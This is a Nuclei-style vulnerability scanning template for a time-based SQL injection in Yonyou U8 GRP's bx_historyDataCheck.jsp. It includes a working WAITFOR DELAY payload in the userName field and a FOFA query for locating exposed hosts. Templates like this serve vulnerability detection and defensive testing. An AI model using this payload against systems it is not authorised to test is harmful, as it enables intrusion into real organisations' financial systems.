id: yonyou-u8-sqli

info:
  name: Yonyou U8 bx_historyDataCheck - SQL Injection
  author: xianke
  severity: high
  description: |
    Yonyou U8 Grp contains a SQL injection vulnerability.
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-grp-u8-bx_historyDataChecks-sqli.yaml
    - https://github.com/MD-SEC/MDPOCS/blob/main/Yongyou_Grp_U8_bx_historyDataCheck_Sql_Poc.py
  metadata:
    max-request: 1
    fofa-query: icon_hash="-299520369"
    verified: true
  tags: yonyou,grp,sqli

http:
  - raw:
      - |
        GET /login.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

      - |
        POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        userName='%3bWAITFOR+DELAY+'0%3a0%3a5'--%26ysnd%3d%26historyFlag%3d

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type_2, "text/html") && contains(body_1, "GRP-U8")'
        condition: and